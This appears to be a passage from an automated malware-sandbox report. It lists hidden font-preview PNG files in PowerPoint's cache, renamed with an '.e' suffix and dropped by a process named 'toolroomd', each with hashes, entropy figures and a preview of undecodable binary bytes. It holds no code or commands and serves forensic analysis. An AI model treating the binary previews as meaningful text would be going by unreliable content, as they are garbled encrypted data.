/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Al TarikhRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1146
Entropy (8bit):	7.2768406076314545
Encrypted:	false
SSDEEP:	24:E0/McTUQlV2awIv/oL21YgsmGf8MKcFIPNDY1wcigsePc0m7:E3csIHoiigcfrKcOlDY1wmNpq
MD5:	771A60A36ED3785DE23E69CC6F631D66
SHA1:	5F8FF721A8688365A6F7D4A3B16EE6CC5CC8C10C
SHA-256:	03C6E5945FDE5774D0CF8804456CD317DD4FC5DEDD374720997C30D3D8E01573
SHA-512:	B9BA458005A239E1C36F9F5DAA697EC674767C500EFCFB19733F0BE40EF55977B985C39584B33D6DEA145C98438DA1826F6667D23BD76B49065CA57EB4CDEE39
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.3.}..0.4.l^..j`:^.v.,.!.........4js$..+..a.%.._...].yz..A\......n.w.R?.xX........<...<.djY){/..Cv..0.%..........8s.+..x.b........gI.......^..V.M_.F.i.......#....Fa.O.f..V..W...^.~..`.k...z..bA.l.'2n..+h.....W;W/.X...Gu...\.W...W".....t..t.uM.....lYFs...b....4..;.....W=T9.G%.......zJ..y".....$.PA\P.].F...<^..._..=..}&h[....u..aZ...[.j...)`E..$..."T.q....\.....#<x$Y.Yq..UB....F........ZL.T.\c.&.J..x.......t..U.A...E.y.a].....y...4e..CE. .:....\|......1w..j.ap^...Y....O7M.%.K..`d.1..iu"...t.x...P..<..D...\|...6...1X29.\| [AT....v.O.&..D.y#......"f...].."..../.l.......!N..xT!\F.$U.b..b...oi...sPh.b.P....z4][.5....W.Z1fqZ......S.J...w.....I...t.?NPwM.....B.....c.......l/...S.E:.....];Ffi.G>B......I..e...H......,7.g...i6@..0.$j=%...q.....I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.American TypewriterRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2434
Entropy (8bit):	7.723144015100168
Encrypted:	false
SSDEEP:	48:EmW2z8v66hWbJnLty7uki/PwAb0WIZQhAK+MA5Pf1ceCUH24bNpq:lW2E66hWR07uki/Pwk0W+L9h1vHlu
MD5:	6F4E604C483D1FB8809FE495319AF726
SHA1:	BC86AA0140E51E7BB7C2FA50C67638AB34341410
SHA-256:	43E5BF48AAFAEF847414B10901018AC492D0682DF5F3DBC80F1E1981A3157713
SHA-512:	78B29DD07476CA85380A7259E31185FDA865AE95D3933AEA2F9CEF19DDA2CC2829DFD4F18BA04694AC70BC06D05AFF902406E67351F3344496A7DB6CB8F824AA
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a@....Ljw.s%..w...^9.0...b...8.N....$.B...tJ..)M....^[.h[.v..?....Y.+.<.X.%...s..,....`......0.I....0.I....0.I....0.I.s..j".H`qc..u...[......#$.c..u...tP..T0\|.<. :...-Us.C.....yIj..Lf..[.ON..^.r.2.m.n......Y.Dg.r...O..,<.....i.......85.l....V.......xt...."..D.j..8.T.....6k.~1A....;...A.....%w..u.. V..%y............G..R......6.\|^...<.#.~2..oM..:..Z./..."y.^qAJ..O...]NO..(....K.o...8.....2...V5..\6...9......j3..I.\|.4....%>...C....}..JY.3.E..]2...!...xP:.Tr..}.9........./D...g?..+y.$q.8N[.c...K.faN...........CW.Kzc1.... M.-.q....z.9.\|.H.q.X...5.W;..l\..L...B..>rd.<VK..@`..#..;vS..........Y..x.V......2.t....T.{b.>.v..Z.;.....E0.F5L..e.F..U....\|...."...%..<.>...........Q!...`L..8....&[.}.<....6..e."U...d{.C.......b...G..>.?".j.....l.i .3.s6.........[.h@..Qi...o>72.....2?.....f.vV.......-..M...9..X.....3...m.XP.'..;..w..@gJ....6.....Q2...4.=.J..M....-V r..7..Dp.....\....,...3z

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Andale MonoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	7.471703919354663
Encrypted:	false
SSDEEP:	24:E7jU6TtPJGm0sVP/7YM2B87cdFcXFZ8w8Aw896x24k56NlsePc0m7:E7YyJGpsdYTQFZv8Aw896x5Npq
MD5:	CE7673244A7030C9AF862A3055FAED34
SHA1:	CA51925E22E777A9BD344A0130F908333D83948C
SHA-256:	F35CFA5D3E978F6CB4D0F1C5FAC9DA3D4C6E75EC4C795F2D9157D57271C2B1A6
SHA-512:	1600AD27468C6007A0D6D12A63384D91EFBD69CFA266814F7E7B642CDBA4CA62BED80F0B212E91943B5E7F8502E18E422ADEB88FA873358DD48BE27BA7FA11A3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...s....&...3......^A....C....<.[..<...b.i.........M..+.$S......R....aL.+.."...+.........k..f.`...3.Q....eX..K.M......6.f...........Bw...5 ..s..F..4......J.0.....:.....[.b..E.2G.2......P#.3........\q.,.../7....UX...r.....R..fc?.u....J.;.2.nh.}.....Mb:P..B..R..W...&...}..\L....}..I....`...j...+0N{.#..s...#.".Y...Z.Yyi.O4.(..B..d=.A.I..P..../..O:....eW.H/.58........7.\|w...+M.gF.1...o........p.e '...P.7...1.{+.ZE..D&i..:.].......[u..E\..e....X~.8.._.)H=.......#..:%.H.........m.......}e.ww.SWiN.-w3Q,.,..5.F#qR....._.'.%.B...r..:....^S..}...a..(..D.I....{.r....6J....m.j1HI....<.S...3.......g.L..'.+.#]s.Ubjim.....sq&...iY,&...1..(.......#.{....]#.a6=i.81.......A...}..P...GB...]...V...D.x....X.#b{..qxHL.....6. ....."F...6R..D.1W.TK.0.......].9..d..=Vw....\|.)...."I..W...&xQD.(..l#.>>C...T.Y.StV.U.N.g9..nW:5.M'.......eJE.J..]....pJ.y..&.1...x..&........C.Y.<..i.b.k.......f....]...<..5.I.....6.{

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Angsana NewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1626
Entropy (8bit):	7.583897836878251
Encrypted:	false
SSDEEP:	24:EKRZxDAQCoZV6V2Cvu6SfFWHfCL/O+8qRqxF6VKJ/zubY7sePc0m7:EKhAlrV2Cvu6WWa7zMSgzL7Npq
MD5:	7B1DCBF71C256F17750230A32EB576C0
SHA1:	67DCC2505C58DD0F63EED0C02B38A9741F8BD173
SHA-256:	8FF19DBF10E39D7DD29D0846A3E7CA86D0EFD135F81ABE85ED433FB1600DAA9D
SHA-512:	C8940C135E88ACC89FF09C75E5DB218D3BF73D979AFAF6DD7BD7F5A1FA218F0F0A00C7B90EDD941B2A706F4020AE6825566383651F5A66A09A96416099B3E1EA
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....`..8.9....) ...g....kX.&3jvwa.,.....0....Ngq...E...Fu].u5.DR.(.^....8...ht}Q......?.t.......!....L%.%....qP.#..........i.6\|.8............L..zp....&..8'.>..U.].J.\|i&.Y....:1;>Q..}.......}]vk.=.n..(..?~.&<.K..M......F.Q.5lA..... `U.F...26..n.u.....{0.A.....m..j.H........F...:.E....../....?P....3.v.YX.Me.(..C<...r...i..mhr...\|w..0F...eC..M~...3.:...v.%.S.4.....^.:.%...?.Z.C).N....ds.......J...N8.SGO.\.w...ewuo....(.....,.ml.P.b...._........@@.....i...W<k._n......h..~.E.5....q.\|..$......<@......Kc.f.?.....AY..\..[p........pk......t.....b.%...pO.....0.H_\|.`H..-......B...z....\.. ...Q..J..RA.W=B..8....2.=....._...Xo.6V.(#d..Z...~..M.*.....,.....N>.])...L.>.....G....Hk..gII.+...M...:~.......xw.0...K'..W..=aOa......l.....V...L_Dt...^.@..<S.q..Z..+..Qy..9.....n.Es.G.E..z.9,..KV..u..q.n.'$.......%..Z...p..F.....c.g...WC..2g}...b.[.@@.E..k._gZ.3.:_..D...I..S'-k.$D#..T..#.ac..N..].0.^...

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple BrailleRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.508822984048107
Encrypted:	false
SSDEEP:	24:Ex9DqO/+wQWX8VnB0vIVAkbXRMpkwiRLbMkx5IBxUT9Z2VwbPtusePc0m7:ExEC+w/XCrV/XR0iJHQxUr0IuNpq
MD5:	8178B7BB787F36071928F8F445A5EFED
SHA1:	A8E9495525555C825CC7C2D1308E8DA9E53B5869
SHA-256:	AF3413649A77FFB3391D1955CC110BE73ADAB221FF904A1BE23B032E0B73FD04
SHA-512:	B71A6312BFAA3B7EC547B6F12EC804EE5559C5E47AC6E9D9F1D1A9EF51D1707FD3DE75F9B02B8B234ADBFCFCCA8E899C0EB25100D34127B4A4EB21AF14BCB22F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.)E.BD._..Q.d...z.A...v.=.6k..Q[_.."\|.gR.2....A.<o.....E..<.x...<.x...1^...o...!>P. l.0...+.ok%N$.u]x.g..>.xK.U......F..o.s.Hg..8..J.(<=...C...q...Q.b....Qt...jxvu........0..DJ.....+._..d...j.EEb........%tLl..)...>..P.J`L. L.o....6S.......P...J.3{.T.C(..W..W.N...x.....W.C.......t6.p...h..R..H..HU.s..+..K....`.f.....h.<.D..s...5.}d.Q4...t.P.}..t...>[##.Z...].4..@...$....)i..;/....]..H.4......z..C....;U&....7.d..vC.R...3...a.x.J.I.8y.&.>.../HB..t.m"\....>....#...[..'...".>I8.z.O.xb<......}...(....8d...BO.t`. Z.y....jN,.F...d.^...X..l.!.....}..d.VT...hd............{5YOq...})....x.C.~..:.<..........Y../....4..I...l.......":.......8M.H.....8`g.\Y-..N..5.D:..ph.-..j`.@..............~.......M#.O..(%7..Bm/."0.....eVXl.........)Gv...w.HE..x.........("O.3.....L...v\....b.B..M2..J1..b..v&.:.G...?...&I.^.....(7......u.I..`.M.....V....()....=..*cXCq...U.Y.XAk=o"K.......O@y.ILQ....O../.c...

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple ChanceryChancery.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.58744848045406
Encrypted:	false
SSDEEP:	24:VZufF0lRGG9+udQ7KjZpee1tfqUQxocMGLuCnyzrL9vzoWTeZ9fm5Dh/XmesePcx:+elb+uG74ZoenoaCnKLyUk9fmvvNpq
MD5:	2B04BC1591E4B1A0DA5C8CB0A87E1E19
SHA1:	A59D07F44D0AC2AC413ED3689456F0E9D4563556
SHA-256:	868802859BC75E1A9755E9426F4006AFBF35D2862F1C4DE69CD42E05A382E01A
SHA-512:	B100962C256A189C093B78B083BB9DE68BC9AD4D5A2A5CF16DA31E9F9F401A14FDF4684CEABA79095EA257F51AA0EC75F05749B140A5208D96B7DF50D848C85F
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a...k..K..8.9....D..t?tc...\M.{M\..+!72.dTajPL.jK..)...n.....U.....2z.....p...cT...}...E..J....c.4....g...Zs..V:...}g....v..8i%S.m.......{..K...Vk.N.....W......(..\|Dh.....Gz.X.u...}..P....._...E.m...{\b=.5......j{Ee&...o#k....z.,...g.m....gQ.r.J..x.4..%...O.\|M....@h..>.WEN.Z...r.X.hJr.....Ao..#L.....H.[s.Xg.Q@;..g..a.."&..Z....".')...5..i...=}D.K4?.U.......T.Co_..A..o..k..f>s.8.S.&....AM..=c..bg.....t.9d.G.o[qe...W.wk.ZV.V..J..[.l..{.^.>+y.=...H~.../....zx..O)....mp..#$........(...Pky..^x.;.(;.j}....T.WU....~..l_E.w"...]...w.E.r...e$......_..l,..[/'y....j.4..2..r....Iy_.5..b.'8.zM...."X.omW.Vdf.Z.._.]d.M....79.9.....0C......."..6. . VP....3..U.4.%.X....i..6..c....B...g.6..U...o.^8&.Y"..\|.5.EQfW..}..........0.......%.R..b.j=.D..EA.....h....>.3.E....s}.z.......%0...+.H!.h......I...A...J....{Os16.\.B.....L.(..Z...%..37+.Q%.U......0.cp..g.q.+..........&.lf.K#.t2..,Q.6jAt'..V........h....e..wl,.<..A..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple Color EmojiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.624826942898795
Encrypted:	false
SSDEEP:	48:ElbAl1ybsrVl1flL2KsreVO3ebdy93wwqCG484p5x9JtIONpq:wAYqbjVOGu3wMG48O9zIOu
MD5:	5E4A16E5FFBD12A794ED82323AEBB4AB
SHA1:	938C0DACDD81AFAAC40045DD2D4260A95F18A285
SHA-256:	5D74FE075516759F3ED695DE826B9A6E1B9AA4A13641B86F4E7EC1A3C5936E51
SHA-512:	49AACD714F351C77D707BEFFD0DCA04D755227A1BCEDE39575F7DEB02ABAD1D34439EC2498DC260AC94B39B74A1D3F541C8A7F4DD8E8E6ED2536C359CDE205EB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a1.mM...H.3...^...3.....M.M....c.8.s.......&..\|h.\%+.W.&=p....H.....5....P....l~=.....^M>.......h..tP.Q...................a.W&..\.7.3...S.i.q.cX...{.....H...\|a<o.;.\..$.B....OA...<...5.W..&....}...:R6...?...t%Y.`....v.F........l-.t.R..U.181hk.R`...i.k..J`7.../.p`..{I....(..........J....6....5.(...n..]....x.....&G...R...N..ar8.~.O.J.%.;.yZ.#...9i?.cDN..........9'..!.yo...kp!Mg..L;g...:u.y.N....l..>/fr.y.\|.[.eUWHw.g.~.r...5w>..e4.x..>..j....... .B....L..B..f....[.....^./.L...}M.AN..H.......8;...e........Zu.M~..Ps...:..z..&.D.3..-..YXH.%.....=)<......I..>.G...(.b...}r.$..1.....O.=....!..o ..\|u.}^\u.8....FG..f.....:...f./.C.#T.#T..m.d.6.;_4=..f..K.d.b...".5./...>...4.....6q....u4.K.u!i..;.8...0hW:..&..j.C.M..r..S.. .....$...g..........Y.rL$.........t....u...Z.R....]...`Y.....-.-r.bz(.Yy.\|..V!..;..R..h....4.V..5%l.FY...$.....hW..5.J....X...E..q$.Y%..9.Loox...t.>,Ff9....n.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple SD Gothic NeoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2050
Entropy (8bit):	7.664241507028709
Encrypted:	false
SSDEEP:	48:EsLOjUpZugtC7Kj9hcXoIT4TXTypLrNpq:/fpY2C7Kjyoi4TXTylru
MD5:	8190F4BA2217FAB86652DD5FD79288A4
SHA1:	D7BC46B32AF0F213AB57F17FB1EEC1C4E15592DC
SHA-256:	59481320431642C09FBAAF2D0A3D8F588D3CFC0FD8005D2E393B9083762EA06E
SHA-512:	4030B6002FD692ED31E717E95DFFA3DDF8F856490B7337FD1DDD871ED2247BF3DBB1CDF32A56A6827E73359168E4EF32A82BB7C623D836B9D778CE9FA21A30BD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.al.o...i.6...T...H.A..I.$.>...?%.......I\|%..m...%...[..>...H.u.........u.N.E:..a&......V8.......d..b..H@..8.....8....<..)..D669:v...J.........A2.Sw...U.,.z.R..,z..`.o...u .Mm#6..cL.7..'.r.W...0...'.x.....5.E2..u.U5...xy........&up..X.....4.....d...DI.KI..k%4.2z.......G..t..U..u.5.p..c.'n..$.....1.....v./.{.....o.1\.G..@G......V........~.@....@...-.}.0..]yB$.......2...6.,@!..eOH<...$?.....s\....R.%I....q.A..!<l./...8A..j.P..V.?-.7!v....rd.&...Z.yS..X:..x#.e%9....,...g.e.....K....].......1..Hc..\|^..g.....E.z..u.=.^2.~.<..j@......n../..BV>.rj:k.[....O.9..6.R6Fv.7.....m........~j.Gf./...uyt.$$.O:.@.uk.qc.m....l.y>..tf.].xb%g...IL...Nn....-....z.Zh..HT...]..9<..L..=.P}...KG.\4.}.$.e.....aK1.....e........{..$........,..V.T.QD.....fz$........+$..v.........[....='.....Q.uB.0.W..*....z/.Q[i-.Z@.Q\|..Y3.;q.h._!...v..I...9.v0&.+....v.A.].?\.M(.i\.W..Xf........I.U..Y.."KR.....,3x.`..Q.4...I~h&.<..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple SymbolsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1802
Entropy (8bit):	7.609830776789813
Encrypted:	false
SSDEEP:	24:EIGcwtdylI1IJpJgRaI+69RFY8R6sn2fR0+e0QVy6uLVX2tQlyPg8q8TA2Re5FsF:EddGJgReib7R52W+e0Sy7V2i864enNpq
MD5:	D6801150482AD22BE8B88DE48F68DF33
SHA1:	859DE50C17CD2C01568E2BD61500967F2A5CA92A
SHA-256:	3167F9AC4CFF35EEB2F22FFE7C2DAA37CAE8737E019D61DB0001F4CC80B8B287
SHA-512:	2F5403CDFFDBCFEDFFEAB01C7CF4390C58FDE2E0CDA57F9CE25903BB604EDD01A0CDF98A8464CCCB1022A8F37DBA86DDD7E441A7AB04768F5EF7692C1358F5DC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aGB.S.\....Fj.U..\|i....."...%%..b...^f.G....^...o.z....u.....S..$x..c..U%@j....g..+BR...^..y.....Y......3<m....b..w....o.?....o.?....o.?.S.,Zu...)o.....m..Le....7.....1C.&......g.J:t..@...D..2k.P..0.#LbY...8;...L.....7...[yu..\....&;41..n;h5u.....~=+..0....].Rb.77y........N...=zw.>.F....BBN...m..,.[pB.Q..Y......F...\?..d...d[mTK...LA}....L.G..%F...~s..T...L..J....m.!..S.. ..UM;..O..............J@.%K....>....}9E..f&....UgZ...~x..D{.2.!..+c..t..k-..wg.....x.....S..&C.=7m{G..\|...Gg..u..#.uS.t.jc.R.v...Y...6.G...AB.{...{.$.Kt.X.b...%......L.cn.YnaS...3R.cy..a..>...9..=..$....<N.......(...).....RtSO".$..........@..z.8.W......T1.f...r.f..r...:.{..v#"."S..v.B...x.-.......6F8...l.....b.....'R......:...^.7.."gO.:........^.t..h.5.x..!x.6(..W.H..)..Y.u9..A ..T.Vrf...\|..&.L..Bn....SF........3.bcV.}>\..\".}^.n.6.6....:k.,Rx.$....@n.aw.[a..z.W}..._e...^......"mo.f...1..:r...[Z.......+q.U...,6..,a..n1....

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AppleGothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.4603549230549415
Encrypted:	false
SSDEEP:	24:E0jOHPcKMqQsfUmXYs911KyrlnLWccsD6v6k85KxPhqNLWsePc0m7:E0jOvcSfUgYiwELcs3k85sPhCaNpq
MD5:	178D1050090A99C2807B58D67ABEBEE9
SHA1:	9A825B0DB758C17C98B8889BDFFAAFBAA66CC6A6
SHA-256:	E2CC9E3D008EB8DE55774E5FCFF25ABF6457E0AB2B80D82E53A028FA5E17234D
SHA-512:	54AB55788C56CCBCD53A4C290E220C5E0B685AAAFEE567FA344030766C501C64A2AC6A6594CEF0FA3A0E6E57BBFB3DF90BE219124C28121551A42B0306C3E1AE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..9zN...SE.P....Y....{"_4D..G..;...3.Y..a..@G)^.~.2.^..f.{h..J.:...m.d]G.N.c......e..2..7X..\|...J.W.4..1(...K........^6..S...lss..EA........l[<S#.h...'.oq"..3...'1.....zra....#-...m....t..z...M.c;..y.pY.r..P..sF....>.!..K..Lq.9U.".........j..<..o,....L;m4.....N.."\..&.....8..W..1W.rku./..Z..L]jI.-..P..Pl..8m...B67..y&..s.....r...5.8.MW.....Q..*.......s&.z...WZ.....Ic.?.../.......s[!..~..2-e........t.e=.pS..@....D....`..$.J..e..p.oW....['...<..;#.&.'c.:.....\.C..........W-..o.........bD$..8-..`.WW.......q..F...8....].~.E_R....3P....8.8(......[.%.4q.7..\..9.^y....t.f ......0..a.5.0........)s9.#..../C.IB..;...u`c.(>..m=t2o..D...=+..s>..2.....F#.B.0..{..;...Ut_..H..K&\X..w...>.....N.Fb..>J.'...}.s9.Ji.3..Se../.m.6.\....2.B?..4....{....].vK.....f.../.S..8.p...G.1.c..D..P....G\|..z....U...h^.!....I//x.4....g#.,"..(YR.)M}d..0...&.d.\|m......K.L.....\)N..aR.C_$e\|...%.>a......(.pP....Z.....a5...L?o\

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AppleMyungjoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1826
Entropy (8bit):	7.613858451149612
Encrypted:	false
SSDEEP:	48:EH3IJTPPaXnaRW9zGhTlt3w+DXl3n+dzNpq:s3yTSXaOyhTlTDV3+dzu
MD5:	01162D772F5E51CDCB40D8318D7A1094
SHA1:	6681D1DF77DA91F3FAF3372701C6629EF0B0E48A
SHA-256:	D6149E08D1ACA55E2ED80C2ABC57603106672395C1746E80A337B28E9DA5C4CB
SHA-512:	CB391684E0A638F63ED37C799DE07A0853F926A42D5B06E942AE1D4E4246F702C3D7140A130D0937ED9869049CEFD6DE4A449C7AA69CFECF46DF3D71A85AC099
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a. .y.........7...K....8.g.'...YT1..`s..n4..QZ..r...].Z...4Q..%..HU.e8Wpg.uB.=v.l3P.A...GTm... ...\Na....6..=....6..=....6..=..A......^.>,..i....y..~......dX..!p.I....Xn.....~f.Umy-33fF..)........;....bG......&2.\|..1..\......C....X..S;........F$..[Z......7...D..D.O.!..,PZ`z:.ao.).[...+"B.E...@...(..1.......v.T.....=x_m%..sE..H..1.z&Q..8..`..q..[.~..9/...J..w....e.XO5aVo.. .....n_y.e)...&.I....{7m..Zg....... vy .CNYH..$.A...vfS.O....a...6..VZ......BP.jE...r...L[.P.C.\.B.@H[....[...@.0.y.T.;....c....\|.v...3.p$......06R...h..'.B.D&.F&.....H/.......1..)\gj.....,m..I....tc...\|.l>~.....%-.GS...p.,....J...6a6t.wSz.=..../.l......0w'..W5.Lv..1;\|N..f..(yj...5.....h.D.......v..{.Z.K..l.....=.u..m_.X.jlh-%.....6.M..c.r.6.!........d.....!..OF....D.......3.....T...K......65.v=.>.8w..Iy.t.Z.}.H.....L.Z...'.S!..... $.../.g.b6.2A..M./iZ..+)...^.....3........T}....&5.)J..xN...T7{M..W_...A...5.x.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial Hebrew ScholarRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2066
Entropy (8bit):	7.683389619502167
Encrypted:	false
SSDEEP:	48:EmV5ENv7omarSMW4MvpKml8NQP/zP9X0/BUGSoX22Npq:h5mk9rrMKQ/zVi2GFXpu
MD5:	2930AA9660C750E23CFAAFC1CC063AEC
SHA1:	94337A0260344D8EA4959B1EDFF9A0C161774450
SHA-256:	42E640C749C2E7C95876B30885F9CA9FAEBA4DC55DBB3E4FFAADA0326412CCFD
SHA-512:	7F385E5EC8A8FF93D97C357A31E96E567F7B280CB742BEAB058DA340991904C6F3B2FE84D9A35F5716436886DFBA1FEAD50CA84FA77441704FC0275C1E5F1187
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...jU..6...T...g...G........6.\L..Y0R.JG............L.#3........b........ulp%.&....u:.>..+;.9@.i.....r..7..$.4.7..$.4h.V...<.w}..?.....\|3.'.W.L=.o.n...6G~3...;.....Z9...l{&+.......B.e.. .x....."..%.W..A!3..8........+..p....8...{..?...Gw......D.D._...W.i.:~O.H.!Z..,.E....w...9.7...;'Z.C....98.....Aq&..qZ...}.Q!..%................=."k..Y..@l....@.;(.....~.dM...7..\..hf..5.%.hG...4....+.......+l6K..3b...5'.R?Z.h....}l..5.....6f..v!.5.O.V'..X9.MP...R...,...U"...N...f6.A....q<.z6.....n.f...1Z%C....UC.5t.8......6d.4..L!S..E...,..o.n<.T..p......kN\|.x....li.X7&...+...S...@.K."M~."M....[h............. ..s.6....Gcq.Ba/VN"..%%1Xy.D..s.)_"..V........JQ%%#..7..?.....h.Y.j"?.....T.UOI 5..$.j.Z..\...8..I.D..>@.9.\|c.....q.e.;..i......D..]eO...Q..4..c ....$7..7X.nR......W..x4.1T...4.. .cU..L..k....&..U.....C...F.<..^...v.....l....62...th?.....\...W.0Vm........j..#..9........o..R.Y.,.>(.t_M.....S=..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial HebrewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1530
Entropy (8bit):	7.525562624899264
Encrypted:	false
SSDEEP:	24:Ew8aNMc+onG2zh3hX6yFQuoVMvxGE0maFQusXI4wOe4Gcd9/4XGsePc0m7:EiNMctnGA3AyFQjVoxj0maQVXtHzzNpq
MD5:	DD701912E7C5D8760F1D984D2889F0B2
SHA1:	BBE094BAA33AD452B1866011EC65710C575109D2
SHA-256:	3EA47E05EE66BD4A334A0EF7A8ED5EBE34672E6158DA799F3C0B073BDC22C845
SHA-512:	30BD42D05CCDCF3A600F41D17927D5DD93D5AFE2240FCE3EFEB68AC3E056A3423C40C2C40028C1EBEC63959B41B4C55EDAD3D6250B91874DCB578821DAC46214
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.G-RK.Y.Rc..=....K..O..].....)b.........N.g..j..".k...m.....E...5}..@....$H......^n/.M.D.o....,.r0%..OX.%.4...X...Y...,.&.K.UO.dK ........T.4....2{DH.....,.O..}\|H0a..._.qi.9. NG...\.Nq.o.UB.Ohd.&.O.&yh...c.......^..c.D...rE.RI..m\|bpS;...k.4.`>...9.l...V.....xv6.G...!.G9.U..v....V..P..4..)..=......vead..g...Q#.(b C..y..6^2<L...o..g..J+............k.....y.e.._..zJ.p5>.0..o...L:..{....he.O{.;...>..&...b...z.$./w.w7..~.......6....Z...I....x.j.{5.~.].........0..kd...S3c....$.C.t\S...bZ..5~E....W.......Y......8I`!.&.P.b.8.Z.j.j.._...\|...}W~..A.......7.....r..1.@.'..q...L....T.MCA.N..ec.?.Crx...J....j...pe..OJcR@.....{ ..X..."..kD..I..Q.....p.o....D~......z=...cd._...~sh.......?L..=..X...+.7[....5....[Z.O:..T.L.........?u.<.;.ag....b.@."..V.q...G.....4.0..@.C..rm~...\E!......jE...c...O..q......$%.Um;..KK.xG2...3d'..kR.....D.;V.e.....l.d=d.U...bqf.iUs.!..nR.+..... .f.%.v.........[...6..+...L...

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial Rounded MTBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1986
Entropy (8bit):	7.662158342904463
Encrypted:	false
SSDEEP:	48:EPTvd5VoNtMm2nbY+LffUeW84LNRbkOHcwY4c0N+Npq:yDdlmG0+LfMewNRbkPPNu
MD5:	C4820BD63596C909764ABA4AA219E445
SHA1:	A059C72A5BF7BA9A50F87E4B7BF2F03C72559D4A
SHA-256:	690A5F14D3537095AC0A3352381F6436AB5B7644EC97BD5C3F9488EA778D32D7
SHA-512:	1CD77921A236FF6A882285177B117CEB5D0F5BD4C5D6B54616E2F27E0380425538BEC6BBC6A9174B50C235F5825EA1989473FBB250DA50EF97A6EB89D31CA4EA
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.'.....t.O...T.J.....cR...-3qP..E.J..Cl5..?.lJ...l$.Nr...AO.:.F...Ymv...._.W[.`...]a.i.....vvO+..1+...ZH...S..1......1......1...."d.l.....8....6.B......y...;.....'p..;........&{/y.../R..../........)..\...f.@.`..O^O.........7....l\|..\|.s2/....n.......O.Rc.. 